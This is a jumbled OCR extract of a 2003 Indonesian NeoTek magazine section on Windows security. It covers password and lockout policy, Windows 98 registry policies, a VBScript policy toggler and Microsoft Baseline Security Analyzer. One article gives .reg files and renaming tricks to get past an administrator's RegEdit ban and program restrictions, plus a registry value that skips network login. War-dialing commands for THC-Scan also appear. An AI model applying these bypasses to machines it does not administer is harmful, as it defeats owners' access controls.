carrier, fax, tone, voice, busy, country, Yang menarik, THC-Scan dapat menerima C:\>set CLIENT=2 && netscan.bat 031555
atau custom. Pada MISCELLANEOUS nomor-nomor untuk ditelepon dari file C:\>thc-scan 2-031555 /M:031555 R:3334-6666 /Q
anda menetapkan setting penting dengan simbol @ untuk menspesifikasi C:\>set CLIENT=3 && netscan.bat 031555
mengenai time delay selama dan fileteks tersebut: C:\>thc-scan 3-031555 /M:031555 R:6667-9999 /Q
di antara dial.

Mei/Jun 2003 NeoTek 17


NeoTekno

TOPIK BAHASAN WINDOWS SECURITY KALI INI MENCAKUP


WI N DOWS SEC U RITY
hal-hal yang berhubungan dengan security policy pada

Poledit:
Windows serta cara penerapannya lewat registry, yang
ditulis oleh beberapa orang yang dapat anda hubungi
apabila ada pertanyaan lebih lanjut. Sebagai pelengkap
disajikan juga tool untuk memeriksa patch yang sudah
terpasang pada Windows untuk memastikan
keamanannya.
• Poledit: Password Policy 18
Password Policy
• Policy pada Windows 98 20
• Policy On/Off dengan VBScript 22
• Bypass Larangan RegEdit 24
• MS Baseline Security Analyzer 26
Policy Editor adalah cara sistematis untuk
Secara tidak langsung, terdapat pula artikel-artikel Delphi
melindungi sistem operasi Windows.
Workshop yang membahas cara membuat tweaking tool Software Poledit tersedia untuk
sendiri menggunakan Borland Delphi 7 Personal Edition Windows 95, Windows 98 (hanya dua features:
yang disediakan dalam CD NeoTek bulan ini.
Local Policies dan Public Policies)
• Borland Delphi 7: Personal Edition Full Version 28
atau pada Windows XP dan W2000 (lebih lengkap).
• Delphi Tweaking Tool 30
Andreas Jiman membahasnya untuk anda.

ELANJUTKAN PEMBAHASAN MENGENAI POLICY EDITOR: alianakjalanan. Secara berurutan maka dua password
M Pelindung MS Window di NeoTek II/10 Juli 2002,
yang dilengkapi dengan bahan local security policy
terakhir akan di-save di dalam PH (hati-hati *.DAT
tidak boleh dihapus, karena akan menyebabkan blue
kali ini dibahas lebih detail, agar rekan-rekan neoteker dapat screen) sewaktu password ketiga diisikan maka pass-
benar-benar mempergunakan Local Security Settings ini word pertama akan dapat dipergunakan kembali.
yang dahulu diatur melalui Policy Editor.
antonali > alianton > [new password] < alianakjalanan
alianton > alianakjalanan > [new password] < (boleh mempergunakan antonali lagi)
Password Policy
Gambar pertama menunjukkan isi dari Password Policy. • Maximum password age
Hati-hati, ini dapat menyebabkan local account password (default: 42 [days])
yang ada sedikit mempunyai karakter. Di window pane Memberitahukan bahwa password yang kita miliki
sebelah kanan dapat dibaca sebagai berikut (sebagai akan berlaku hanya selama 42 hari. Ini sebenarnya
standard default value): sudah normal dan mirip dengan password validity
dari Novell (jika rekan-rekan Neoteker mengenal
Novell Network System)
• Minimum password age
(default: 0 [days])
Merupakan kebalikan dari kriteria sebelumnya. Jika
nilai ini kita ubah menjadi 2, maka jika kita memiliki
password baru di system ini, maka password tersebut
harus kita pergunakan selama 2 hari dan selama itu
tidak akan diperbolehkan mengganti password, kecuali
policy ini diubah kembali ke nilai asalnya.
Yang sering kita temui adalah bahwa password yang
kita input terkadang harus memenuhi persyaratan:
Gambar 1. Password Policy semuanya huruf, semua angka, atau gabungan semua-
nya dan terdiri dari 6 atau 8 ketikan tombol abjad di
• Enforce password history keyboard kita. Minimum password length policy ini
(default: 0 [passwords remembered]) yang mengatur itu. Pada Win9x/Me sering kali kita
Jika kita ingin keamanan PC kita terjamin, password dapat masuk tanpa mengetikkan password atau juga
yang pernah kita miliki akan dimasukkan ke PH hanya dengan menekan Cancel. Itu dikarenakan per-
(Password History), misalnya kita ganti dengan angka tama ketidakadaannya pengaturan keamanan local
2, maka password berikutnya yang terbaru tidak boleh (local security policy) dan memang default-nya adalah
sama dengan yang tercantum di PH. angka 0.
Contoh: password pertama: antonali, password kedua: • Password must meet complexity requirements
alianton, maka password ketiga harus lain misalnya (default: disabled)

18 NeoTek Mei/Jun 2003


NeoTekno

Merupakan criteria yang dihubungkan dengan server.


Jika kita enabled status ini, maka secara langsung
policy dari PC kita yang terhubung dengan Network
ber-Server Windows (minimal Win2k Server) akan
mencari tahu kompleksitas password creation yang
terdapat di Server, dan meng-implementasikannya ke
PC lokal (diharapkan berhati-hati, tidak disaran meng-
gunakannya jika merasa ragu-ragu dengan kapasitas
dan karakter dari Server yang dimiliki)
• Store password using reversible encryption for all
users in domain
(default : disabled)
Merupakan policy yang berbahaya. Disarankan tetap
membiarkan defaultnya, karena ini juga merupakan
sumber jalan masuknya intruder dari sisi lain seperti
internet. Jika Certification Service di server rekan-
rekan tidak ter-install dengan baik, hal ini juga akan
menyebabkan terjadinya password open line (POL)
yang merupakan jalan mudah bagi intruder untuk
mendapatkan password windows rekan-rekan.
Gambar 3. Nama tersendiri untuk setiap file registry
Redefinisi Local Security Policy
Sebelum mengubah dan mendefinisikan ulang local secu- Lockout Policy adalah batas yang menjaga proses user
rity policy, disarankan untuk meng-ekspor registry login ke OS lokal kita. Aktivasinya hanya pada waktu OS
Windows terlebih dahulu. yang kita miliki mempunyai struktur policy yang sama
dengan policy server. Win2K berpasangan dengan Win2K
Jalankan Registry Editor (rregedit.exe, bukan reged32.exe) Server (Advanced).
dengan memilih Start > Run dan ketikkan regedit. Akan
muncul jendela tampilan Registry Editor. Highlight My Selain itu fungsi batasan ini akan disabled sama sekali alias
Computer (Gambar 2). tidak dapat diubah. Policy inilah yang akan membuat
account di lokal dikunci alias dimatikan atau dideaktifkan.
Bila ada orang yang bermaksud menggunakan PC kita
dan berusaha masuk dengan cara mengisi login user name
dan passwordnya, maka account kita akan dideaktifkan
setelah kesalahan login beberapa kali. Ini fungsi yang juga
digunakan di setiap ATM (automated teller machine).
Bagaimana? Rekan-rekan sudah lebih mengetahui ten-
tang tool yang satu ini? Nantikan saja edisi berikutnya
yang akan membahas lebih banyak lagi. Neotek akan
mengulasnya hingga selesai.

Gambar 2. Jalankan regedit.exe

Klik File > Export…, berikutnya akan ditampilkan satu


window dialog seperti Gambar 3. Langkah terakhir adalah
memberikan nama pada file registry (berisi semua konfi-
gurasi PC kita berikut semua policy dan class system-nya)
yang akan di-save.
Jika ada yang error, kita hanya membutuhkan jalan untuk
masuk ke Interface OS kita lalu tinggal dobel klik file
registry kita tadi, dan restart saja PC kita, untuk mengem-
balikannya ke posisi awal. (Perhatian: Jangan mengguna-
Gambar 4. Account lockout policy
kan fasilitas System Recovery dari Third Party maupun
dari Microsoft sendiri yang kurang teruji kehandalannya)
Hati-hati pula, untuk pengguna Win2Ksp3 dan WinXP,
jangan sampai pada instalasi software apapun sampai
menghapus permanen Folder -System Volume Information

Account Lockout Policy


Persah salah memasukkan PIN sanmpai tiga kali di ATM
dan setelah itu kartu ATM kita tertelan? Ini adalah contoh
sehari-hari dari account lockout policy.Kita dapat kembali
ke tema Policy sebelumnya. Kita bahas langsung Account
Lockout Policy yang mempunyai 3 karakter. Account.
Gambar 5. Masih banyak policies yang dapat dipelajari.

Mei/Jun 2003 NeoTek 19


NeoTekno

W I N D OWS S E C U R I T Y
Policy pada Windows 98
Policy pada Windows 98 dapat diutak-atik (tweak) dengan Registry Editor khususnya pada segmen
registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Fitrianto Halim (fitriantoh@hotmail.com) membahasnya untuk anda.

OLICY (KEBIJAKAN) SELAIN DITERAPKAN INSTANSI peme- Dalam percobaan, ternyata beberapa nama ternyata tidak
P rintah dan swasta, ternyata juga dapat diterapkan
pada program aplikasi. Pada artikel ini, penulis akan
memerlukan value (nilai) dan beberapa nama dapat langsung
dilihat efeknya tanpa memerlukan restart.
membahas mengenai policy pada sistem operasi Microsoft Sebagai contoh, penulis akan membahas untuk nama
Windows 98. Untuk itu, Anda memerlukan registry editor NoDrives. Jalankan RegEdit, lalu masuk ke key:
(RegEdit) dan jangan lupa untuk mem-backup registry
Anda untuk menghindari hal-hal yang tidak diinginkan. HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
Pada suatu hari, PC milik teman penulis terkena virus
makro. Setelah virus makro tersebut berhasil dibersihkan, Pada menu Edit, pilihlah New > Binary Value. Ganti name
ternyata menu "Run" dan "Shut Down" masih tetap New Value #1 dengan NoDrives. Anda tidak perlu mema-
tidak tampak pada "Start Menu". sukkan value (nilai) untuk nama ini.
Sebagai teman, tentunya penulis berusaha membantunya
dengan mencari informasi, dimana salah satu rujukannya
adalah MSDN. Setelah melakukan pencarian (search) de-
ngan beberapa kata-kunci, akhirnya penulis mendapat-
kannya. Ternyata, hal ini berkaitan dengan policy
(kebijakan) untuk "Explorer" atau terdapat pada key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
Iseng-iseng, penulis melakukan pencarian (search) dengan
kata-kunci "NoRun" (untuk menghilangkan menu "Run")
untuk semua file yang berada pada direktori: "C:\Windows".
Hasilnya cukup mengejutkan, karena ada beberapa file yang
memanfaatkannya. Setelah penulis buka file-file tersebut
satu per satu, ternyata file shell32.dll memuat informasi
terbanyak yang berkaitan dengan policy (kebijakan) untuk
Explorer, karena memuat lebih dari 50 nama, yaitu:
• ActiveDesktop • NoFolderOptions
• ClassicShell • NoForgetSoftwareUpdate
• ClearRecentDocsOnExit • NoHTMLWallPaper
• EnforceShellExtensionSecurity • NoInternetIcon
• ForceCopyACLWithFile • NoLogoff
• LinkResolveIgnoreLinkInfo • NoNetConnectDisconnect
• MyDocsOnNet • NoNetHood
• NoActiveDesktop • NoMovingBands
• NoActiveDesktopChanges • NoMSAppLogo5ChannelNotify
• NoAddingComponents • NoPrinterTabs
• NoAddPrinter • NoRealMode
• NoChangeStartMenu • NoRecentDocsHistory
• NoChangingWallPaper • NoRecentDocsMenu
• NoClose • NoResolveSearch
• NoCloseDragDropBands • NoResolveTrack
• NoClosingComponents • NoRun
• NoCommonGroups • NoSaveSettings
• NoComponents • NoSetActiveDesktop
• NoCustomizeWebView • NoSetFolders
• NoDeletePrinter • NoSetTaskbar
• NoDeletingComponents • NoSettingsWizards
• NoDesktop • NoStartBanner
• NoDriveAutoRun • NoStartMenuSubFolders
• NoDrives • NoTrayContextMenu
• NoDriveTypeAutoRun • NoViewContextMenu
• NoEditingComponents • NoWebMenu
• NoFavoritesMenu • NoWindowsUpdate
• NoFileMenu • RestrictRun
• NoFileUrl • WinOldApp
• NoFind
Gambar 1. Membuat binary value baru dengan nama NoDrive

20 NeoTek Mei/Jun 2003


NeoTekno

• OCX (ActiveX)
• dan lain-lain.
Disable Regedit
Salah satu yang menarik adalah Anda juga dapat me-non-
aktifkan program RegEdit, yaitu pada key
HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\System
(buat key System seandainya belum ada) dengan nama
DisableRegistryTools dengan nilai 1 (tipenya DWORD).
Untuk lebih jelasnya, Anda dapat melihat Gambar 4.

Gambar 2. Sebelum penambahan binary value NoDrive

Gambar 4. Disable Registry Tool

Jika Anda khawatir, copy terlebih dahulu program RegEdit.exe


dengan nama lain (misal: _RegEdit.EXE), lalu dengan pro-
gram hex editor buka file hasil copy tersebut dan cari kata-
kunci DisableRegistryTool. Ganti DisableRegistryTools
Gambar 3. Setelah penambahan binary value NoDrive dengan kata lain (misalkan: DisableRegisterTools). Kini,
orang lain tidak dapat menjalankan program RegEdit, tetapi
Pada Gambar 2 dan Gambar 3, Anda dapat melihat perbeda- Anda tetap dapat mengedit registry dengan cara menggu-
annya pada aplikasi Windows Explorer (Anda bisa langsung nakan program hasil copy yang telah diubah tersebut.
melihat hasilnya tanpa memerlukan restart). Gambar 5 menunjukkan penolakan ketika menjalankan
Sebagai catatan, penulis telah meng-install Internet Explorer program RegEdit yang telah dinonaktifkan.
6.0 (karena IE yang ada berpengaruh pada kemampuan Win-
dows Explorer, seperti langsung menampilkan drive C: jika
tersedia IE 6.0).
Ingat, nama NoDrives hanya menghilangkan tampilan
drive-drive pada aplikasi (terutama untuk aplikasi-aplikasi
Microsoft ataupun yang memanfaatkan shell32.dll).
Walaupun demikian, Anda tetap dapat memanfaatkan drive-
drive tersebut dengan cara mengetikannya. Sedangkan
untuk aplikasi-aplikasi under DOS tidak ada masalah. Gambar 5. Kini orang lain tidak bisa mengutak-atik registry anda
Telaah Sendiri Policies yang Lain
Karena penulis masih penasaran, kini penulis melakukan Penutup
pencarian (search) dengan kata-kunci "policies" untuk Jika Anda perhatikan, Microsoft sepertinya agak ceroboh,
semua file yang berada pada direktori: "C:\Windows". sehingga informasi vital seperti policy (kebijakan) dapat
Dari hasil pengamatan, ternyata selain policy (kebijakan) didapatkan dengan mudah, yaitu cukup dengan melakukan
untuk "Explorer", ada pula untuk "Network", "System", pencarian (search) dengan kata-kunci "policies".
"Peer" dan mungkin masih ada yang lain... ? Penulis berharap, tulisan ini dapat bermanfaat untuk me-
Policy (kebijakan) terdapat pada file-file dengan ekstensi: ningkatkan security (keamanan) PC Anda disamping ten-
• CPL (Control Panel) tunya dapat mengatasi seandainya terkena virus yang
• DLL memanfaatkan policy (kebijakan) tersebut.
• EXE Selamat mencoba...

Mei/Jun 2003 NeoTek 21


NeoTekno

W I N D OWS S E C U R I T Y
Policy On/Off dengan VBScript
Setelah memahami cara manual mengubah policy pada Windows 98 melalui registry,
kali ini Fitrianto Halim (fitriantoh@hotmail.com) menyajikan programming sederhana
menggunakan VBScript untuk melakukan perubahan pada registry.

EBELUMNYA KITA TELAH BELAJAR MENDAPATKAN POLICY • Pada bagian Components: cari Windows Scripting Host
S yang terdapat pada aplikasi-aplikasi pada sistem ope-
rasi Windows 98. Kali ini kita membuat aplikasi
dengan melakukan scroll ke bawah. Tanda "tick"
menandakan bahwa Windows Scripting Host telah ter-
sederhana untuk mengaktifkan atau menonaktifkan policy. install.
Agar lebih mudah dipahami dan dapat dicoba dalam wak- • Jika belum ter-install, beri tanda "tick" lalu tekan OK
tu singkat, penulis membuatnya dalam bentuk file HTML Untuk lebih jelasnya, lihat Gambar 1, 2, dan 3.
yang di dalamnya berisi script-script VBScript.
Aktifkan Dulu Windows Scripting Host
Bagian terpenting adalah Windows Scripting Host (WSH),
karena digunakan untuk penulisan registry dalam aplikasi
ini. Selain VBScript, Anda sebetulnya dapat memanfaatkan
JScript (JavaScript dari Microsoft) untuk membuat aplikasi
ini. Dalam aplikasi ini, kita harus memasukkan value (nilai)
dari setiap nama, karena WSH tidak memiliki kemampu-
an untuk memasukkan nama tanpa nilai.
Dari hasil coba-coba dan mencari informasi di MSDN,
akhirnya penulis mendapatkan infomasi nilai-nilai yang
dibutuhkan untuk tiap-tiap nama, baik untuk mengaktif-
kan maupun untuk menonaktifkannya. Sebetulnya, kita
dapat menghapus nama tersebut untuk mengaktifkannya
kembali, tetapi pada aplikasi ini mempergunakan cara
pemberian suatu nilai pada nama tersebut.
Yang menarik adalah nilai-nilai untuk nama NoDrives
akan berpengaruh pada drive-drive mana yang ditampil-
kan atau tidak ditampilkan (pada Windows Explorer ber-
arti yang dapat diakses atau tidak dapat diakses).
Karena aplikasi ini memanfaatkan WSH, maka Anda ha-
rus mengetahui apakah WSH telah ter-install atau tidak
pada PC yang akan Anda pergunakan. Caranya mudah:
• Pada Control Panel pilihlah Add/Remove Programs
• Pada tab Windows Setup pilihlah Accessories lalu klik
tombol Details...

Gambar 1. Pada Control Panel pilih Add/Remove Program Gambar 2 dan 3. Pilih tab Windows Setup > Accessories > WSH

22 NeoTek Mei/Jun 2003


NeoTekno

Tweaking Tool Berbasis HTML • Karena kita


menggunakan
Sekarang, kita coba aplikasi ini yang penulis beri nama sebuah kon-
MySecure.htm. (file MySecure.htm disediakan dalam CD trol ActiveX
NeoTek atau bisa dibuat sendiri dengan text editor) dari Windows
<HTML> Scripting
<BODY> Host, maka
<form name=Form1 method=post>
<table>
akan muncul peringatan. Klik tombol Yes untuk meng-
<tr><td><b>Fungsi</b></td><td><b>Aktif</b></td><td><b>Non- gunakannya.
aktif</b></td></tr>
<tr><td>Drive</td> <td><input type=radio name=Check1
• Sebuah page (halaman) baru akan muncul untuk menam-
checked></td><td><input type=radio name=Check1></td></tr> pilkan informasi perubahan status yang telah Anda pilih.
<tr><td>Menu Documents</td><td><input type=radio name=Check2
checked></td><td><input type=radio name=Check2></td></tr>
<tr><td>Menu Favorites</td><td><input type=radio name=Check3
checked></td><td><input type=radio name=Check3></td></tr>
<tr><td>Menu File</td> <td><input type=radio name=Check4
checked></td><td><input type=radio name=Check4></td></tr>
<tr><td>Menu Find</td> <td><input type=radio name=Check5
checked></td><td><input type=radio name=Check5></td></tr>
<tr><td>Menu Log Off</td> <td><input type=radio name=Check6
checked></td><td><input type=radio name=Check6></td></tr>
<tr><td>Menu Run</td> <td><input type=radio name=Check7
checked></td><td><input type=radio name=Check7></td></tr>
<tr><td>Menu Settings</td> <td><input type=radio name=Check8
checked></td><td><input type=radio name=Check8></td></tr>
<tr><td>Menu Shut Down</td><td><input type=radio name=Check9
checked></td><td><input type=radio name=Check9></td></tr>
<tr><td>RegEdit</td> <td><input type=radio name=Check0
checked></td><td><input type=radio name=Check0></td></tr>
<tr><td colspan=3 align=center><input type=button value="Ganti" Gambar 6 dan 7. MySecure.htm
name=Button1></td></tr> berisi VBScript yang menggunakan
</table>
</form> salah satu kontrol ActiveX pada
<script language="VBS"> Windows Scripting Host.
<!--
Dim l1,l2,l3,l4,l5,l6,l7,l8,l9,l0
Dim s1,s2,s3
Dim myErr,WsShell Beberapa efek ada yang tidak memerlukan restart, namun
Sub Button1_onClick
ada pula yang memerlukan restart. Namun, terkadang
Initialize() pada suatu PC tidak memerlukan restart, tetapi pada PC
If myErr Then lainnya memerlukan restart. Oleh karena itu, ada baiknya
Fail()
Else Anda tetap me-restart PC yang Anda pergunakan setelah
Work() menjalankan aplikasi ini. Bagi yang menonaktifkan menu
Success()
End If
Shut Down, jalan satu-satunya untuk melakukan restart
End Sub Gambar 4. Bagian awal dari file
adalah dengan menekan kombinasi tombol: Ctrl-Alt-Del.
Function Initialize() MySecure.htm seaktu dibaca dengan text
On Error Resume Next processor seperti WordPad. File lengkapnya
Err.Clear ada di CD NeoTek bulan ini.
myErr=False
Gambar 8. Menu Shut Down di-nonaktifkan.
Akibatnya untuk me-restart anda harus
Cara mencoba aplikasi ini sebagai berikut: menggunakan kombinasi Ctrl-Alt-Del
• Buka file MySecure.htm dengan Internet Explorer.
• Pilihlah status yang Anda inginkan, apakah "Aktif"
atau "Non-aktif" yang bersesuaian dengan fungsinya.
Setelah itu, klik tombol Ganti.

Gambar 9. Tampilan Windows Explorer setelah menu-menu dinonaktifkan.

Penutup
Mudah-mudahan artikel ini dapat meningkatkan keamanan
PC Anda dari tangan-tangan jahil.
Gambar 5. File MySecure.htm apabila dibuka menggunakan browser.

Mei/Jun 2003 NeoTek 23


NeoTekno

W I N D OWS S E C U R I T Y
Bypass Larangan RegEdit
Regedit merupakan tool yang ampuh untuk mengutak-atik sistem operasi Windows, tetapi juga bisa
merusak apabila tidak digunakan pada tempatnya. Tidak heran bila system administrator sering kali
men-disable fasilitas ini. Putut Indrayana (matrik7@yahoo.com) membahas cara mengatasinya.

EBELUMNYA FITRIANTO HALIM MEMBAHAS CARA men- Terlihat bahwa file bypass.reg kini tersimpan di disk seba-
S disable regedit.exe, tetapi bagaimana bila yang
men-disable itu orang lainj, sehingga kita tidak
gai suatu registry file, yang untuk menjalankannya, ting-
gal double click saja.
bisa menggunakan regedit? Ketika kita ingin mengedit Akan tampil pesan bahwa informasi yang ada dalam file
registry namun tidak bisa menggunakan regedit.exe ka- ini akan ditambahkan pada registry (dalam hal ini yang
rena sistem komputer kita telah di-protect oleh admin akan ditambahlkan adalah registry entry yang mengaktif-
dan ketika menjalankan regedit kita mendapatkan pesan kan kembali regedit.exe)
registry editing has been disabled by your system ad-
ministrator, di komputer kita. Klik OK dan akan tampil pesan berikutnya bahwa infor-
masi yang ada pada file bypass.reg telah berhasil dimasuk-
kan ke dalam registry.

Gambar 2. Sebelum penambahan binary value NoDrive

Cara membaypassnya adalah dengan membuat file .reg


yang berisi key sebagai berikut:
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

Namun bisa saja admin sengaja menghilangkan regedit.exe


sebagai tindakan pengamanan, jika ini terjadi, kita tinggal
meng-copy regedit.exe dari computer lain dan meng-copy-
nya ke komputer yang hendak kita lihat file registry nya.
Atau mungkin admin melakukan pengamanan dengan
mengijinkan program tertentu dan melarang program
tertentu untuk dijalankan. Jika itu terjadi, maka kita ha-
nya perlu mengubah nama file regedit.exe menjadi nama
lain. Misal kita hanya boleh menjalankan notepad.exe
Tulis key diatas mengunakan notepad lalu simpan meng- dan tidak diijinkan mejalakan regedit.exe, maka kita ting-
gunakan ekstensi .reg dengan nama file sesuai dengan gal me-rename file regedit.exe kita menjadi notepad.exe
yang kita kehendaki (misalnya bypass.reg). dan kita sudah bisa melihat isi file registry-nya.

24 NeoTek Mei/Jun 2003


NeoTekno

Cara Menjebol Login dan Password Komputer yang • NoFolderOptions


• NoLogoff
Terhubung ke Jaringan • NoRecentDocsMenu
• NoRun
Jika komputer kita terhubung ke jaringan dan saat per- • NoSaveSettings
tama komputer dinyalakan kita mendapati message box • NoSetActiveDesktop
yang meminta login id dan password, maka untuk dapat • NoSetFolders
menjebolnya kita perlu membuat .reg file sebagai berikut: • NoSetTaskbar
• NoViewContextMenu
REGEDIT4 • NoFile
[HKEY_LOCAL_MACHINE\Network\logon] • EditLevel
"MustbeValidated"=dword:00000000 • AddPrinter
• DeletePrinter
tulis key di atas dengan notepad dan simpan dengan • NoDriveTypeAutoRun
ekstesi .reg. Khusus untuk menjalankan file registry ini • NoNetHood
harus melalui Real DOS Mode. • NoStartBanner

Cara menggunakannya Pada key tersebut poledit akan membuat nilai dword 1
untuk pengaktifan registrynya dan 0 untuk me-nonaktf-
1. Boot komputer anda, sebelum masuk ke Windows te- kan key registry tersebut.
kan F8 dan pilih "real dos mode" dari option yang ada.
Contoh:
2. Copy file registry yang telah kita buat ke c:
Buat file registry sebagai berikut untuk menonaktifkan
3. Jalankan file registry yang telah kita buat, misalkan pilihan Run pada Windows Start > Run (suatu contoh
file registry-nya diberi nama test.reg , maka untuk
pembatasan akses yang dilakukan oleh poledit.)
menjalakannya, pada DOS prompt ketik:
C:\> regedit test.reg 1. Tulis pada notepad registry key sebagai berikut:
lalu tekan enter. REGEDIT4
4. Restart komputer anda. [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoRun"=dword:00000001
File registry yang telah kita buat akan mengijinkan kita 2. Beri nama run-off.reg, dan jalankan (double click pada
untuk login ke komputer yang akan kita gunakan tanpa icon-nya).
perlu memasukan username dan password, dan hanya
dengan menekan tombol Cancel kita sudah bisa login. 3. Restart komputer anda dan lihat perubahannya.
Sekarang kita membuat penangkal dari file run-off.reg
Melumpuhkan Poledit yang telah membuat kita kehilangan fungsi Run di
Windows (menjebol batasan yang dilakukan poledit)
1 Tulis pada notepad registry key sebagai berikut:
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoRun"=dword:00000000
2. Beri nama run-on.reg, dan jalankan (double click pada
icon-nya).
3. Restart dan lihat perubahannya.
Sekarang kita dapat kembali mengunakan fasilitas Run.
Seperti itulah pembatasan yang dilakukan poledit pada
sistem Windows kita
Task Sceduler
Task scheduler adalah pro-
gram bawaan Windows un-
tuk menjadwalkan kapan
Poledit merupakan andalan Windows dalam mengaman- suatu program berjalan sesuai waktu yang kita kehendaki
kan sistemnya dari orang-orang yang tidak berkepenting- pada jam/hari/bulan yang telah kta pilih. Ada kemungkinan
an dan tidak diinginkan untuk mengakses Windows kita. bahwa admin membuat agar poledit dijalankan oleh Task
Kali ini kita akan mencoba melumpuhkannya agar kita scheduler untuk aktif setiap kali komputer restart, yang
dapat mengakses Windows dengan leluasa berarti registry akan balik ke awal setiap kali Windows
Poledit sesunguhnya program sederhana yang menulis- melakukan boot ulang.
kan key-key registry ke system registry Windows untuk Cara penanggulangannya :
membatasi akses atau program tertentu. Dan poledit ini
menuliskan key registry-nya pada: 1. Double click Task scheduler yang terletak di pojok
kanan bawah.
HKEY_CURRENT_USER/Sofware/Microsoft/Windows/
CurrentVersion/Policies/Explorer 2. Dari daftar program yang ada di Task scheduler, pilih
System policy editor
dan meletakan key-key sebagai berikut:
• NoClose 3. Lalu delete System policy editor ini
• NoDesktop
• NoDrives dan sekarang setiap kali booting kita tidak akan diganggu
• NoFavoritesMenu lagi oleh poledit.
• NoFind

Mei/Jun 2003 NeoTek 25


NeoTekno

W I N D OWS S E C U R I T Y
MS Baseline Security Analyzer
Vulnerabilities pada Windows secara berkala selalu diatasi dengan patch yang selalu diterbitkan oleh
Microsoft. Hanya banyaknya patch dan kesibukan sehari-hari membuat para admin sering kali lalai
meng-update-nya. Albert Siagian (asiagian@gmx.net) memperkenalkan MBSA untuk mengatasinya.

UDAH BANYAK ARTIKEL YANG MEMBAHAS CARA menem- 1. Install MBSA dengan double click file MBSASETUP.MSI
S bus keamanan dari Operating System (OS) buat-
an Microsoft. Sudah banyak juga virus-virus yang
dan ikuti petunjuk yang diberikan sampai selesai.
memakan korban data/file penting dalam hard disk yang 2. MBSA otomatis dijalankan setelah proses instalasi se-
menggunakan OS dari Microsoft ini. Tapi banyak peng- lesai. Kalau tidak, bisa dijalankan lewat menu Start > All
guna komputer pribadi, termasuk Administrator Jaringan, Programs > Microsoft Baseline Security Analyzer (Windows
enggan/tidak menyadari pentingnya untuk selalu install XP) atau Start > Programs > Microsoft Baseline Security
Update/Patches terbaru dari Microsoft. Analyzer (Windows 2000). Klik Scan a computer untuk
memulai pemeriksaan satu komputer.
Salah satu penyebabnya bisa jadi karena terlalu banyak
patch yang dikeluarkan. Sulit untuk memonitor patch baru, 3. Untuk memulai scan, an-
walaupun Microsoft sudah menyediakan fasilitas Windows da harus konek ke Internet
Update dan Auto-Update untuk otomatisasi pemilihan patch dahulu. MBSA membutuh-
mulai dari Windows 98 sampai Windows XP. kan file MSSECURE.CAB
(190KB) yang otomatis di-
Kali ini penulis mengulas alat bantu/tool untuk pengguna download dari situs Micro-
OS dari Microsoft. Alat bantu ini dibuat oleh Microsoft soft. Dalam file ini terdapat
untuk memudahkan pemeriksaan keamanan dari OS kom- file MSSECURE.XML, yai-
puter dan Server yang digunakan. Keistimewaaan alat tu informasi-informasi ter-
bantu/tool ini, terutama untuk Administrator Jaringan, kini dari patch yang tersedia
adalah bisa memeriksa keamanan/security seluruh kom- di situs Microsoft. Jika su-
puter dalam jaringan secara otomatis dari satu komputer. dah terkoneksi ke Internet,
Sayangnya, aplikasi ini hanya bisa di-install di mesin OS pilih Start scan untuk me-
Windows 2000 (Professional/Server/Advanced) dan Win- mulai scanning.
dows XP (Home/Professional). Kabar baik untuk Admin-
istrator Jaringan, MBSA bisa memeriksa keamanan mesin
dengan OS Windows NT 4.0 (Workstation dan Server),
walaupun tidak dapat di-install di OS tersebut.
Alat bantu aini dalah suatu aplikasi bernama Microsoft
Baseline Security Analyzer (M MBSA) versi 1.1. Anda bisa
dapatkan dalam CD NeoTek bulan ini atau download di
http://www.microsoft.com/technet/treeview/default.asp?
url=/technet/security/tools/Tools/mbsahome.asp
Instalasi file MBSA menggunakan format Microsoft
Installer yang sudah ada di Windows 2000/Windows XP.
Jika ingin untuk mendapatkan Microsoft Installer versi
terbaru/2.0 (untuk Windows 2000 saja, karena Windows
XP sudah menggunakan versi terbaru), ada di CD Neotek 4. Setelah scanning selesai, koneksi Internet dapat diputus. Ter-
atau download di http://www.microsoft.com/downloads/ lihat beberapa catatan mengenai keamanan komputer. Ada 21
release.asp?releaseid=32832&area=top&ordinal=43 Security Updates yang tidak di-install di komputer contoh.

26 NeoTek Mei/Jun 2003


NeoTekno

5. Informasi lebih jelas, anda bisa klik di What was scanned


dan Result Detail. Setelah klik Result Detail di layar sebelum-
nya, akan muncul daftar Updates/Patches yang tidak ada di
komputer ini. Klik yang diberikan untuk melihat informasi
lebih lanjut, serta men-download dan install patches tersebut.

9. Proses yang terdahulu dilakukan via GUI, yang memu-


dahkan pengguna biasa. Jika dibutuhkan, aplikasi ini juga bisa
dijalankan melalui Command Line. Hal ini berguna bagi Ad-
ministrator Jaringan jika ingin menjalankan fasilitas ini secara
6. Selain Updates/Patches untuk Operating System, MBSA otomatis melalui Batch File (.BAT/.CMD) Masuk ke DOS,
juga mencek keamanan lainnya, misalnya, apakah sudah meng- pindah ke folder C:\Program Files\ Microsoft Baseline Secu-
gunakan partisi NTFS atau masih FAT32, sudah tutup Guest rity Analyzer dan jalankan file MBSACLI.EXE dengan para-
account atau belum, dsb. Juga ada rekomendasi yang dapat meter yang dibutuhkan. Untuk melihat parameter-parameter
anda lakukan. Hal yang sama berlaku untuk IIS (Internet yang tersedia, ketik MBSACLI /? Layar berikut memberikan
Information Services), SQL Server, dan Microsoft Office. contoh parameter yang digunakan untuk men-scan 2 komputer.

10. Hasil scanning dibawah ini menunjukkan ada dua kompu-


7. MBSA juga memiliki kemampuan untuk men-scan lebih ter yang harus di periksa lebih lanjut, dan install Patches jika
dari satu komputer. Fitur ini berguna, baik untuk pengguna yang diperlukan. Dengan sedikit kreativitas, buat batch file agar
memiliki beberapa komputer atau Administrator Jaringan scanning ini dilakukan secara berkala. Hasil scanning dapat
yang mengatur puluhan atau ratusan Server serta Workstation. diarahkan dalam bentuk file teks untuk anda review.
Caranya pilih menu Pick multiple computers to scan di bagian
kiri MBSA. Masukkan Domain Name dari Network anda, dan
biarkan MBSA yang men-scan seluruh komputer dalam satu
Domain. Bisa juga scanning berdasarkan IP address range. Mi-
salnya, anda ingin men-scan keamanan server saja, workstation
